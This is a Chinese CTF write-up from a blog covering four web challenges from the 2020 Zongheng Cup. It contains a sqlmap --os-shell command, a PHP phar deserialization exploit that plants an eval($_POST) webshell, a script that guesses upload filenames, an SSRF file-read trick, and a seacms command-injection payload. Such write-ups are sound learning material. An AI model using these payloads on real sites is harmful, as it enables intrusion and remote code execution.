纵横杯2020 web wp


WankkoRee师傅、Mr.水函师傅带飞我,这次比赛学到不少东西,先放个排名,膜拜师傅们
paiming
第一次ak web,后援团的大师傅们的思路都很骚,多多学习,今天被引号闭合搞了两次,以后注意,phar的闭合与cms的闭合
webak

easyci

早上起来晚了,队友说这个sqlmap就能跑,当时我还不信,没见过比赛还能用sqlmap的。起床后自己试了试真的是欸,但是没用,跑出来的账号密码登陆没东西,flag也不在数据库,那就要getshell了,但是不知道绝对路径,马子写不上去,从团长那里得到yu师傅提示,读取配置文件/etc/apache2/sites-enabled/000-default.conf,得到网站绝对路径/var/sercet/html,用sqlmap进行getshell:py2 .\sqlmap.py -r ..\a.txt --os-shell手动选择路径,尽情玩耍

#/etc/apache2/sites-enabled/000-default.conf
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/sercet/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

hello_php

扫描目录,发现www.zip备份文件,下载后审计源码,得到登陆账号密码:admin,admin888,登陆后的页面有上传文件,且在index.php页面发现file_exists函数,使用phar进行反序列化攻击,exp如下:

<?php
/**
 * @Author:     yq1ng
 * @Date:       2020-12-26
 * @challenges: hello-php
 */
class Config{
    public $title;
    public $comment;
    public $logo_url;
    public function __construct(){
        global $title;
        global $comment;
        global $logo_url;
        $this->title= "'?><?php eval(\$_POST[1]);?>";
        $this->comment = "yq1ng";
        $this->logo_url = $logo_url;
    }
}
@unlink("phar1.phar");//unlink() 函数删除文件。
$phar = new Phar("phar.phar");
$phar->startBuffering();//开始缓冲Phar写操作
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$A=new Config;
$phar->setMetadata($A);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//以字符串的形式添加一个文件到phar档案添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

由于上传文件的命名方式为时间戳的md5,所以再写一个获取时间戳md5的脚本,用来尝试上传后文件名,脚本使用方式为,先开启脚本,紧接着上传文件,然后挨个试文件名,上传后寻找文件名,未出现404则成功

import time
import hashlib

def md5vale(key):
    input_name = hashlib.md5()
    input_name.update(key.encode("utf-8"))
    print(input_name.hexdigest())

for i in range(5):
    a=str(int(time.time()))
    md5vale(a)
    time.sleep(1)

然后使用phar伪协议读取
img=phar://
进入config.php进行rce
rce_phpinfo
查看flag发现并不行,没有权限,使用蚁剑插件进行bypass,上次网络不错一口气把蚁剑插件全部download了,也不会用,这次跟着团长学会了这个插件
flag

ezcms

https://www.cnblogs.com/Spec/p/11188198.html

www.zip下载源码,使用弱口令登陆后台:URL/adm1n/login.php,admin,admin868
在模块管理的采集管理处进行ssrf,使用file协议读取发现被ban
ban-file://
尝试使用:<yq1ng><a href="httpxxx://../../../../../../flag">123</a></yq1ng>

提交后点击采集测试,得到flag
flag

大家一起来审代码

rce:https://github.com/ciweiin/seacms/issues/11

www.zip下载源码,但是此cms的漏洞在7月22日的github上由reallws发布,直接rce即可
查看源码发现admin被改为adm1n,进入后台使用默认密码进入URL/adm1n/login.php:admin,admin
在系统-百度推送处存在rce
rec
Payload:";system(phpinfo());?>#


文章作者: yq1ng
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yq1ng !
评论
  目录